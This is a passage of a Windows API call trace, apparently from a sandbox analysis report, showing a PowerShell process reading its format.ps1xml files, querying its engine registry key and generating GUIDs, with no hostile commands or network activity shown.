	[0546.378] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.378] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.378] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.379] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.382] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.383] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.383] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.383] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.384] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0xe67, lpOverlapped=0x0) returned 1
	[0546.384] ReadFile (in: hFile=0x324, lpBuffer=0x302c177, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302c177*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0546.384] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0546.384] CloseHandle (hObject=0x324) returned 1
	[0546.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.385] SetErrorMode (uMode=0x1) returned 0x1
	[0546.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0546.385] SetErrorMode (uMode=0x1) returned 0x1
	[0546.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.385] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x324) returned 0x0
	[0546.385] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0546.385] CoTaskMemAlloc (cb=0x5a) returned 0x2560b0
	[0546.385] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2560b0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0546.385] CoTaskMemFree (pv=0x2560b0) 
	[0546.386] RegCloseKey (hKey=0x324) returned 0x0
	[0546.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.387] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb761b6c2, Data2=0x5371, Data3=0x43c3, Data4=([0]=0xae, [1]=0x11, [2]=0xd5, [3]=0x89, [4]=0xac, [5]=0x3c, [6]=0xdc, [7]=0x6b))) returned 0x0
	[0546.388] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xfc4b6bf8, Data2=0xaa16, Data3=0x4d4e, Data4=([0]=0x91, [1]=0xd9, [2]=0x11, [3]=0xd9, [4]=0x9f, [5]=0xcf, [6]=0x93, [7]=0xfe))) returned 0x0
	[0546.388] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe9adfcc3, Data2=0x77cf, Data3=0x49c6, Data4=([0]=0xa9, [1]=0xec, [2]=0xad, [3]=0x52, [4]=0x2c, [5]=0xd6, [6]=0x73, [7]=0xa4))) returned 0x0
	[0546.389] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x6ea3ce8f, Data2=0x5a05, Data3=0x4f6e, Data4=([0]=0xb5, [1]=0xfe, [2]=0xa1, [3]=0xf7, [4]=0x83, [5]=0x38, [6]=0x48, [7]=0x11))) returned 0x0
	[0546.390] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xef4dc038, Data2=0x60a5, Data3=0x4df1, Data4=([0]=0xa9, [1]=0x6d, [2]=0xf4, [3]=0xe1, [4]=0xbe, [5]=0x69, [6]=0x41, [7]=0x72))) returned 0x0
	[0546.390] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xff79b10b, Data2=0x550a, Data3=0x40af, Data4=([0]=0xbe, [1]=0xb4, [2]=0xb0, [3]=0x88, [4]=0xc6, [5]=0xb5, [6]=0x91, [7]=0xf6))) returned 0x0
	[0546.390] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5015bb85, Data2=0xa9f3, Data3=0x4daf, Data4=([0]=0x84, [1]=0xd, [2]=0xef, [3]=0xba, [4]=0x18, [5]=0x28, [6]=0xa0, [7]=0xdc))) returned 0x0
	[0546.391] VirtualQuery (in: lpAddress=0xabf40, lpBuffer=0xace00, dwLength=0x30 | out: lpBuffer=0xace00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0546.392] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x1ef0b960, Data2=0x9f6a, Data3=0x4d3c, Data4=([0]=0x8d, [1]=0x98, [2]=0x2d, [3]=0x8d, [4]=0x78, [5]=0xb, [6]=0x66, [7]=0xbc))) returned 0x0
	[0546.393] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x29d0bcd9, Data2=0x490e, Data3=0x4059, Data4=([0]=0xa6, [1]=0x15, [2]=0x82, [3]=0xb0, [4]=0x97, [5]=0x98, [6]=0x5, [7]=0xce))) returned 0x0
	[0546.393] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x45cd9c0a, Data2=0x6a8a, Data3=0x4488, Data4=([0]=0x82, [1]=0x57, [2]=0x97, [3]=0x46, [4]=0xf6, [5]=0x3b, [6]=0xc3, [7]=0x1e))) returned 0x0
	[0546.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xa6386af8, Data2=0x4229, Data3=0x4d1b, Data4=([0]=0x94, [1]=0x17, [2]=0x1a, [3]=0xae, [4]=0xfb, [5]=0x9d, [6]=0xa0, [7]=0x34))) returned 0x0
	[0546.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8c89adcb, Data2=0xd79d, Data3=0x46f5, Data4=([0]=0x9e, [1]=0xf6, [2]=0x6d, [3]=0xab, [4]=0xf1, [5]=0xca, [6]=0x42, [7]=0x28))) returned 0x0
	[0546.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5831e09b, Data2=0x7277, Data3=0x4b6e, Data4=([0]=0x9d, [1]=0x26, [2]=0x95, [3]=0x4b, [4]=0xb5, [5]=0x81, [6]=0x5f, [7]=0x30))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xc4173c44, Data2=0x6669, Data3=0x4125, Data4=([0]=0x80, [1]=0x80, [2]=0x6, [3]=0x69, [4]=0x18, [5]=0x58, [6]=0x2b, [7]=0x67))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5dd31dd2, Data2=0xbb17, Data3=0x4019, Data4=([0]=0x93, [1]=0x3d, [2]=0xc4, [3]=0xff, [4]=0xeb, [5]=0x6e, [6]=0xdf, [7]=0x2f))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8887f533, Data2=0x5a75, Data3=0x491d, Data4=([0]=0xa5, [1]=0x67, [2]=0xb7, [3]=0x58, [4]=0x1, [5]=0x75, [6]=0x85, [7]=0x7d))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8892c8dc, Data2=0xf649, Data3=0x474b, Data4=([0]=0xb1, [1]=0xa7, [2]=0xa0, [3]=0x1, [4]=0x7a, [5]=0x96, [6]=0xb, [7]=0x82))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x785f0194, Data2=0x645f, Data3=0x4016, Data4=([0]=0xa9, [1]=0xdc, [2]=0xa, [3]=0xaa, [4]=0x43, [5]=0xdc, [6]=0x2, [7]=0x1c))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xdf5c07c4, Data2=0xa847, Data3=0x4cee, Data4=([0]=0xba, [1]=0xc5, [2]=0x60, [3]=0x6, [4]=0x87, [5]=0xf8, [6]=0xa, [7]=0x19))) returned 0x0
	[0546.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x98ce62ec, Data2=0xd616, Data3=0x461f, Data4=([0]=0xa7, [1]=0xb5, [2]=0x36, [3]=0x57, [4]=0x1f, [5]=0xce, [6]=0xc5, [7]=0x5))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb8d7b9e, Data2=0xc8b6, Data3=0x4215, Data4=([0]=0xb4, [1]=0x99, [2]=0xf2, [3]=0x5b, [4]=0x60, [5]=0xb5, [6]=0xe1, [7]=0x70))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x68e06a14, Data2=0x4dd, Data3=0x46de, Data4=([0]=0xa4, [1]=0x57, [2]=0x8f, [3]=0xd1, [4]=0xc, [5]=0xad, [6]=0xfa, [7]=0x58))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x63a33a5a, Data2=0xb169, Data3=0x408b, Data4=([0]=0x9d, [1]=0xe4, [2]=0xd2, [3]=0x9a, [4]=0xa1, [5]=0x7, [6]=0x5, [7]=0x68))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb192a9ab, Data2=0x5529, Data3=0x4de9, Data4=([0]=0xb6, [1]=0x61, [2]=0x9d, [3]=0x2e, [4]=0x52, [5]=0x52, [6]=0x66, [7]=0xb1))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x383eb878, Data2=0xeb5c, Data3=0x47c4, Data4=([0]=0x92, [1]=0x30, [2]=0xdc, [3]=0x42, [4]=0x88, [5]=0xd6, [6]=0xd7, [7]=0xac))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x403a1c9b, Data2=0x7865, Data3=0x4cc5, Data4=([0]=0x9a, [1]=0x40, [2]=0x71, [3]=0x1, [4]=0x1, [5]=0xb5, [6]=0x97, [7]=0x2f))) returned 0x0
	[0546.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8d2a72b3, Data2=0x1112, Data3=0x4fd6, Data4=([0]=0xbc, [1]=0xac, [2]=0xcd, [3]=0xaf, [4]=0xe5, [5]=0x53, [6]=0x9c, [7]=0x75))) returned 0x0
	[0546.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb54a59e7, Data2=0x9f3c, Data3=0x47bf, Data4=([0]=0x97, [1]=0x7f, [2]=0x45, [3]=0xe7, [4]=0xcc, [5]=0x28, [6]=0x91, [7]=0x8a))) returned 0x0
	[0546.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x90f5e1ea, Data2=0x7dc1, Data3=0x40c8, Data4=([0]=0x8e, [1]=0xd9, [2]=0xed, [3]=0x62, [4]=0x1e, [5]=0x5, [6]=0x5c, [7]=0x64))) returned 0x0
	[0546.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xcde8adfe, Data2=0x1465, Data3=0x4f21, Data4=([0]=0x96, [1]=0xc8, [2]=0x3a, [3]=0xb4, [4]=0x53, [5]=0xaa, [6]=0x8, [7]=0xd8))) returned 0x0
	[0546.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5fdc0a20, Data2=0x6af0, Data3=0x46ac, Data4=([0]=0xb7, [1]=0x56, [2]=0x9b, [3]=0x9f, [4]=0x96, [5]=0xa9, [6]=0x23, [7]=0x81))) returned 0x0
	[0546.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x4748323b, Data2=0x7bf8, Data3=0x4cf9, Data4=([0]=0x8e, [1]=0xa0, [2]=0x83, [3]=0x5e, [4]=0x75, [5]=0x51, [6]=0x55, [7]=0xbf))) returned 0x0
	[0546.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x442c2dcb, Data2=0xe27f, Data3=0x40a9, Data4=([0]=0xa0, [1]=0x56, [2]=0xae, [3]=0xc0, [4]=0x5d, [5]=0x14, [6]=0xde, [7]=0x1d))) returned 0x0
	[0546.398] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x95f63b75, Data2=0xd3cd, Data3=0x4bb1, Data4=([0]=0xbc, [1]=0x23, [2]=0xb4, [3]=0x62, [4]=0x40, [5]=0xee, [6]=0xdc, [7]=0x36))) returned 0x0
	[0546.399] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x39c6af46, Data2=0x90f9, Data3=0x46b8, Data4=([0]=0x8a, [1]=0x97, [2]=0xbe, [3]=0x70, [4]=0x2, [5]=0x6c, [6]=0xf0, [7]=0xfc))) returned 0x0
	[0546.399] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd382a6ac, Data2=0xddb9, Data3=0x4866, Data4=([0]=0x89, [1]=0xaf, [2]=0xa, [3]=0x1f, [4]=0xc0, [5]=0x6, [6]=0x4a, [7]=0x2b))) returned 0x0
	[0546.399] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xfd21464d, Data2=0x8c99, Data3=0x4dc4, Data4=([0]=0xb9, [1]=0xeb, [2]=0x33, [3]=0x65, [4]=0x33, [5]=0xbc, [6]=0x5b, [7]=0xf6))) returned 0x0
	[0546.399] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x4dce12d3, Data2=0x2f83, Data3=0x4dee, Data4=([0]=0xae, [1]=0x4b, [2]=0x16, [3]=0x92, [4]=0x6b, [5]=0x8f, [6]=0x7, [7]=0x3c))) returned 0x0
	[0546.399] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x211ce68, Data2=0x6cc1, Data3=0x4964, Data4=([0]=0x9d, [1]=0x1e, [2]=0x4b, [3]=0x9e, [4]=0x7b, [5]=0x29, [6]=0xe8, [7]=0x7f))) returned 0x0
	[0546.399] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x6ad4ae96, Data2=0x7a7e, Data3=0x4e11, Data4=([0]=0xa3, [1]=0xcb, [2]=0xeb, [3]=0x34, [4]=0x5f, [5]=0x38, [6]=0x39, [7]=0x8f))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe8bf8773, Data2=0xb08e, Data3=0x49e1, Data4=([0]=0xb2, [1]=0xc0, [2]=0xa, [3]=0x39, [4]=0xdc, [5]=0x8b, [6]=0xc9, [7]=0x70))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xdcfc82be, Data2=0x1478, Data3=0x4997, Data4=([0]=0xb4, [1]=0x2, [2]=0xa3, [3]=0xd9, [4]=0x27, [5]=0x15, [6]=0xcc, [7]=0x3f))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x36cebfc8, Data2=0xd898, Data3=0x4874, Data4=([0]=0x81, [1]=0x52, [2]=0x7d, [3]=0xf2, [4]=0xe6, [5]=0xf5, [6]=0xd8, [7]=0xc6))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x1bb60809, Data2=0xc1db, Data3=0x44f3, Data4=([0]=0x8a, [1]=0x46, [2]=0x25, [3]=0x90, [4]=0x11, [5]=0xec, [6]=0xb4, [7]=0x92))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x303bb721, Data2=0x24be, Data3=0x4200, Data4=([0]=0x91, [1]=0x2b, [2]=0x78, [3]=0xf7, [4]=0xcf, [5]=0xc, [6]=0x86, [7]=0x4b))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xace09d87, Data2=0xd5ec, Data3=0x4695, Data4=([0]=0xb9, [1]=0x93, [2]=0x60, [3]=0x6b, [4]=0x66, [5]=0x22, [6]=0x6b, [7]=0x87))) returned 0x0
	[0546.400] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x2458e64f, Data2=0x46a7, Data3=0x4f9a, Data4=([0]=0x92, [1]=0x90, [2]=0x39, [3]=0x9d, [4]=0xfd, [5]=0xd5, [6]=0xea, [7]=0xa8))) returned 0x0
	[0546.401] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x3b85250a, Data2=0x7aeb, Data3=0x4e3f, Data4=([0]=0xa3, [1]=0x44, [2]=0xef, [3]=0xa1, [4]=0x7e, [5]=0xda, [6]=0x4, [7]=0x99))) returned 0x0
	[0546.401] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0546.401] GetFileType (hFile=0x324) returned 0x1
	[0546.401] SetErrorMode (uMode=0x1) returned 0x1
	[0546.401] GetFileType (hFile=0x324) returned 0x1
	[0546.401] ReadFile (in: hFile=0x324, lpBuffer=0x318ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x318ab40*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.402] ReadFile (in: hFile=0x324, lpBuffer=0x318ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x318ab40*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.402] ReadFile (in: hFile=0x324, lpBuffer=0x318ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x318ab40*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.402] ReadFile (in: hFile=0x324, lpBuffer=0x318ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x318ab40*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.402] ReadFile (in: hFile=0x324, lpBuffer=0x318ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x318ab40*, lpNumberOfBytesRead=0xad2d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0546.402] ReadFile (in: hFile=0x324, lpBuffer=0x3189f5c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3189f5c*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0546.402] ReadFile (in: hFile=0x324, lpBuffer=0x318ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x318ab40*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0546.402] CloseHandle (hObject=0x324) returned 1
	[0546.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.403] SetErrorMode (uMode=0x1) returned 0x1
	[0546.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0546.403] SetErrorMode (uMode=0x1) returned 0x1
	[0546.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.403] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x324) returned 0x0
	[0546.403] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0546.403] CoTaskMemAlloc (cb=0x5a) returned 0x2560b0
	[0546.403] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2560b0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0546.404] CoTaskMemFree (pv=0x2560b0) 
	[0546.404] RegCloseKey (hKey=0x324) returned 0x0
	[0546.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.404] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xfd215290, Data2=0xcc30, Data3=0x4507, Data4=([0]=0x86, [1]=0x22, [2]=0xd, [3]=0x6a, [4]=0xb3, [5]=0xd2, [6]=0xe3, [7]=0xdd))) returned 0x0
	[0546.405] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x937b4bf9, Data2=0x5563, Data3=0x42dc, Data4=([0]=0x95, [1]=0x6d, [2]=0xaf, [3]=0xea, [4]=0xe2, [5]=0xc, [6]=0x4b, [7]=0xca))) returned 0x0
	[0546.405] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0546.405] GetFileType (hFile=0x324) returned 0x1
	[0546.405] SetErrorMode (uMode=0x1) returned 0x1
	[0546.405] GetFileType (hFile=0x324) returned 0x1
	[0546.405] ReadFile (in: hFile=0x324, lpBuffer=0x31c8928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c8928*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.405] ReadFile (in: hFile=0x324, lpBuffer=0x31c8928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c8928*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.406] ReadFile (in: hFile=0x324, lpBuffer=0x31c8928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c8928*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
